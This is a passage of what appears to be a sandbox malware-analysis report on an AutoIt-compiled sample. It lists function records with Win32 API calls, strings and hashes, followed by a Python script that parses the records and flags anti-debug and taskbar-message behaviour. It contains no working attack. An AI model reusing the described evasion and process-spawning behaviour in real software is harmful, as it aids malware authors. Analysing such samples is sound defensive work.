                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$BuffCharUpper
                        • String ID: STOP
                        • API String ID: 1256254125-2411985666
                        • Opcode ID: 4d8f2e3a3c7b28649c0b9b00790c3daf083edf38da97d538c3f3d646593c3bf8
                        • Instruction ID: 2a5fab5ca46b2eebd9bf4bb33ce96071ff2b4ddca5e5d59f8add7efffe7d9d29
                        • Opcode Fuzzy Hash: 4d8f2e3a3c7b28649c0b9b00790c3daf083edf38da97d538c3f3d646593c3bf8
                        • Instruction Fuzzy Hash: D40104326119268ACF239FBDDC829BF37A8EA60710B020534F86296194EB31E800CA50
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                          • Part of subcall function 00393CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00393CCA
                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00391D4C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 624084870-1403004172
                        • Opcode ID: 5cdb1c18eebf846200f70e9da7e3024c3f8bd303be8acd6c519bdc16bedd9533
                        • Instruction ID: cca44a25c546fabcdbbb3a1140cd2f1300129d2f08e50a45b51b47c5839dc644
                        • Opcode Fuzzy Hash: 5cdb1c18eebf846200f70e9da7e3024c3f8bd303be8acd6c519bdc16bedd9533
                        • Instruction Fuzzy Hash: C301D871651219ABCF0AFBA4CD55DFE7768EF46350F04051AF8226B2D1EA705908C760
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                          • Part of subcall function 00393CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00393CCA
                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00391C46
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 624084870-1403004172
                        • Opcode ID: 084e512d1cb449e771f2fa0d45c9a18b3d2ef7db145f1361b8ed2ff391a42947
                        • Instruction ID: 09ee02cf6a8c71d5b6c87e37047de10a89b8335ee6e52722fdecf847240d3207
                        • Opcode Fuzzy Hash: 084e512d1cb449e771f2fa0d45c9a18b3d2ef7db145f1361b8ed2ff391a42947
                        • Instruction Fuzzy Hash: 1D01A775685109A6DF07EB90CA91EFF77AC9F51340F14001AF5167B281EA609E08CAB1
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                          • Part of subcall function 00393CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00393CCA
                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00391CC8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 624084870-1403004172
                        • Opcode ID: d94f733863031bd06061a7e8930f52d6b2ebf2766d4d660f267b942df69ddf3d
                        • Instruction ID: 1d5ee1b10a49ab56900a229231c2451beda1a408f769b768846639653796a3b2
                        • Opcode Fuzzy Hash: d94f733863031bd06061a7e8930f52d6b2ebf2766d4d660f267b942df69ddf3d
                        • Instruction Fuzzy Hash: 7A01D6B6680119A7DF07EBA0CA41EFE77AC9B11340F540016B902BB281EAA09F08CA71
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0034A529
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Init_thread_footer_wcslen
                        • String ID: ,%@$3y8
                        • API String ID: 2551934079-1164007899
                        • Opcode ID: ec8bab402d0757081e394135bbaaf566d43519f2a0a56730275b7d77f3e40e37
                        • Instruction ID: 53d87b3b6a72626cd2b77488f65d326774462e4c210e1e0b0dbcf4850e75cc4f
                        • Opcode Fuzzy Hash: ec8bab402d0757081e394135bbaaf566d43519f2a0a56730275b7d77f3e40e37
                        • Instruction Fuzzy Hash: D6012B31780A1097C517F768EE5BFAD33949B06711F4040AAF9056F2D3DEA0BD45869B
                        APIs
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00403018,0040305C), ref: 003C81BF
                        • CloseHandle.KERNEL32 ref: 003C81D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CloseCreateHandleProcess
                        • String ID: \0@
                        • API String ID: 3712363035-863861157
                        • Opcode ID: 1ae6b5179de2cedf9dba8f5847400b2fc0d601d98ff4f1d45836bd2edaad1326
                        • Instruction ID: 685b577d86eb8b36efed367b18521faffc18f8adfa3467cb522af22990d96b7a
                        • Opcode Fuzzy Hash: 1ae6b5179de2cedf9dba8f5847400b2fc0d601d98ff4f1d45836bd2edaad1326
                        • Instruction Fuzzy Hash: 2FF03AB5641300BAE2216F61AC49FB73E5CEB06752F008471BA08E91A2D67A9E0483E8
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen
                        • String ID: 3, 3, 16, 1
                        • API String ID: 176396367-3042988571
                        • Opcode ID: d6f77451893602de22780862506e603e51c5b8af3f41718c4d14c6d4e9abb57d
                        • Instruction ID: 6707a5156badb25daf1692c6346c170a9b8aeb9f7a312435638e17aa4c72f315
                        • Opcode Fuzzy Hash: d6f77451893602de22780862506e603e51c5b8af3f41718c4d14c6d4e9abb57d
                        • Instruction Fuzzy Hash: FAE02B06608220209237127B9CC6DFF5689CFC5756710182BFE81C6276EB948DD193E0
                        APIs
                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00390B23
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Message
                        • String ID: AutoIt$Error allocating memory.
                        • API String ID: 2030045667-4017498283
                        • Opcode ID: 686ab64540e1c8308b67842534fda1b4ee8ae5ca6d51f6abcbf9a934ac8ff8f6
                        • Instruction ID: 0762136c92a177fafb23beeb5db5d13c48f0bd6b25d1ca3d8c18721c21b22528
                        • Opcode Fuzzy Hash: 686ab64540e1c8308b67842534fda1b4ee8ae5ca6d51f6abcbf9a934ac8ff8f6
                        • Instruction Fuzzy Hash: A0E0D8312443083ED21B36947C43FC97AC48F05B11F14442AFB8C9D4D38BE1789047A9
                        APIs
                          • Part of subcall function 0034F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00350D71,?,?,?,0033100A), ref: 0034F7CE
                        • IsDebuggerPresent.KERNEL32(?,?,?,0033100A), ref: 00350D75
                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0033100A), ref: 00350D84
                        Strings
                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00350D7F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                        • API String ID: 55579361-631824599
                        • Opcode ID: 20ea3b815226ca240a4891a37145b8d4c2babe2c26b4ce4c06b11a30787ca306
                        • Instruction ID: a7769486690d2e9fdc078ed1d81599a9e5c73caeabcc7fd4c48a33a9349c9e9f
                        • Opcode Fuzzy Hash: 20ea3b815226ca240a4891a37145b8d4c2babe2c26b4ce4c06b11a30787ca306
                        • Instruction Fuzzy Hash: B8E092742003418FD7369FB8D544B827BF4AF00741F044D2DE886CA661DBB6F8488B91
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0034E3D5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Init_thread_footer
                        • String ID: 0%@$8%@
                        • API String ID: 1385522511-2711268310
                        • Opcode ID: 79d36dcca685fd563fce98412caf7460a083411f35536b6dd03d47a7ec1e992c
                        • Instruction ID: 7c91f3662d1fbad59474b8ca6ccb2ccac7df5af1a5fba31d525e1fb5f02760f1
                        • Opcode Fuzzy Hash: 79d36dcca685fd563fce98412caf7460a083411f35536b6dd03d47a7ec1e992c
                        • Instruction Fuzzy Hash: 03E08639414910EBC60B9B18BF5DE8A3395FB05320F9151B5F512AF1E29BB53841865D
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LocalTime
                        • String ID: %.3d$X64
                        • API String ID: 481472006-1077770165
                        • Opcode ID: 894534f987653bc3fd3e8896a851242a329b4f6071cb4465946ee8e782d5df67
                        • Instruction ID: 54f341bef324f242a3c5cf808e0d992840424539952f5f5773c7cac024ab7e69
                        • Opcode Fuzzy Hash: 894534f987653bc3fd3e8896a851242a329b4f6071cb4465946ee8e782d5df67
                        • Instruction Fuzzy Hash: 4BD01271808208F9CB52B6D0DC49CB9B3BCFB08301F608892F906D2880D624D5086761
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C232C
                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003C233F
                          • Part of subcall function 0039E97B: Sleep.KERNEL32 ref: 0039E9F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 69303dc77eb4bb709c23abc2a26de169ec0766ed836fa8dc4d6401db74f48c98
                        • Instruction ID: dab4a4ee6de4e8d93c9ff4417ac48dabb561287415caba183f92ebfe205aa43b
                        • Opcode Fuzzy Hash: 69303dc77eb4bb709c23abc2a26de169ec0766ed836fa8dc4d6401db74f48c98
                        • Instruction Fuzzy Hash: C6D012367A4310B7E665B771DC0FFD6BA189B40B14F005916F74AEA1D0C9F4B805CB54
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C236C
                        • PostMessageW.USER32(00000000), ref: 003C2373
                          • Part of subcall function 0039E97B: Sleep.KERNEL32 ref: 0039E9F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 244e71142076a0ca28674325e2b4b8582da27e6eb8f90a28b0f8a384e8bf2f88
                        • Instruction ID: 97d73e884ce49b4719df8c014e665cdf139924e4f3d311793e8b9aded24cf457
                        • Opcode Fuzzy Hash: 244e71142076a0ca28674325e2b4b8582da27e6eb8f90a28b0f8a384e8bf2f88
                        • Instruction Fuzzy Hash: 39D0C9327913107AE666B7719C0FFC6A6189B45B14F005916B74AEA1D0C9A4B8058B58
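The function records above are raw plugin output, and the same layout repeats for every function in the report. As an added example (not Joe Sandbox code and not part of the report), the Python below parses those per-function blocks (APIs / Strings / Memory Dump Source / Similarity) into structured entries and does two things an analyst wants from them: it flags the behaviours visible in these records, namely the IsDebuggerPresent call and the FindWindowW(Shell_TrayWnd) followed by PostMessageW with message 0x111 (WM_COMMAND), and it groups functions by their API String ID, which shows that the two Shell_TrayWnd records share one API+string profile while having different Opcode IDs. Assumptions: the record layout is inferred from this listing, the SAMPLE text is a constructed excerpt trimmed from three of the records on this page, and the anti-debug API list is the analyst's own triage list rather than anything the report defines. Treat the flags as triage hints, not verdicts; the IsDebuggerPresent in the first record sits on ATL's CAtlBaseModule initialisation-failure path (the OutputDebugStringW text is the standard ATL library message), so it is library code rather than the sample's own check.

```python
"""Parse Joe Sandbox IDA-plugin function records and triage them.

Added example for this report, not Joe Sandbox code. Record layout inferred
from the listing on this page; SAMPLE is a constructed excerpt (trimmed) of
three records from that listing.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt modelled on three records above (addresses/IDs as on the page).
SAMPLE = """\
APIs
  • Part of subcall function 0034F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00350D71,?,?,?,0033100A), ref: 0034F7CE
• IsDebuggerPresent.KERNEL32(?,?,?,0033100A), ref: 00350D75
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0033100A), ref: 00350D84
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00350D7F
Memory Dump Source
• Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
• API String ID: 55579361-631824599
• Opcode ID: 20ea3b815226ca240a4891a37145b8d4c2babe2c26b4ce4c06b11a30787ca306
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C232C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003C233F
  • Part of subcall function 0039E97B: Sleep.KERNEL32 ref: 0039E9F3
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 69303dc77eb4bb709c23abc2a26de169ec0766ed836fa8dc4d6401db74f48c98
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C236C
• PostMessageW.USER32(00000000), ref: 003C2373
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 244e71142076a0ca28674325e2b4b8582da27e6eb8f90a28b0f8a384e8bf2f88
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
# "Name.MODULE(args), ref: ADDR" with an optional "Part of subcall function ADDR:" prefix;
# the parentheses and the comma are absent on lines such as "Sleep.KERNEL32 ref: 0039E9F3".
API_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str                # call-site address
    subcall: Optional[str]  # callee address when the call is reported from a subcall


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # Memory Dump Source + Similarity key/values

    @property
    def opcode_id(self):
        return self.meta.get("Opcode ID", "")


def parse_records(text):
    """Split the listing into one FunctionRecord per 'APIs' block."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":  # every record starts with its APIs block
                rec = FunctionRecord()
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.fullmatch(body)
            if m:  # lines that do not parse are skipped rather than guessed at
                args = m["args"].split(",") if m["args"] is not None else []
                rec.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif section == "Strings":
            rec.strings.append(body)
        else:
            key, _, value = body.partition(": ")
            rec.meta[key] = value
    return records


WM_COMMAND = 0x0111  # Win32 message id; the value posted to Shell_TrayWnd in the records above
ANTI_DEBUG_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent"}  # analyst's own triage list


def triage(records):
    """Map Opcode ID -> list of flags worth a second look (hints, not verdicts)."""
    out = {}
    for rec in records:
        flags = [f"anti-debug: {n}" for n in sorted({a.name for a in rec.apis} & ANTI_DEBUG_APIS)]
        targets_tray = any(a.name == "FindWindowW" and a.args[:1] == ["Shell_TrayWnd"] for a in rec.apis)
        for a in rec.apis:
            # Only flag when the message id and wParam were actually recovered by the plugin.
            if targets_tray and a.name == "PostMessageW" and len(a.args) > 2 \
                    and int(a.args[1], 16) == WM_COMMAND:
                flags.append(f"taskbar WM_COMMAND wParam=0x{int(a.args[2], 16):X}")
        out[rec.opcode_id] = flags
    return out


def cluster_by_api_string_id(records):
    """Group functions sharing an API String ID: same API+string profile, possibly different code."""
    groups = defaultdict(list)
    for rec in records:
        groups[rec.meta.get("API String ID", "")].append(rec.opcode_id)
    return dict(groups)
```

Run `parse_records` over a saved copy of the listing to get one record per function; `triage` keys its output by Opcode ID so the flags can be joined back to the fuzzy hashes, and `cluster_by_api_string_id` is the cheap way to spot near-duplicate helpers (as with the two Shell_TrayWnd functions) before looking at the instruction-level hashes.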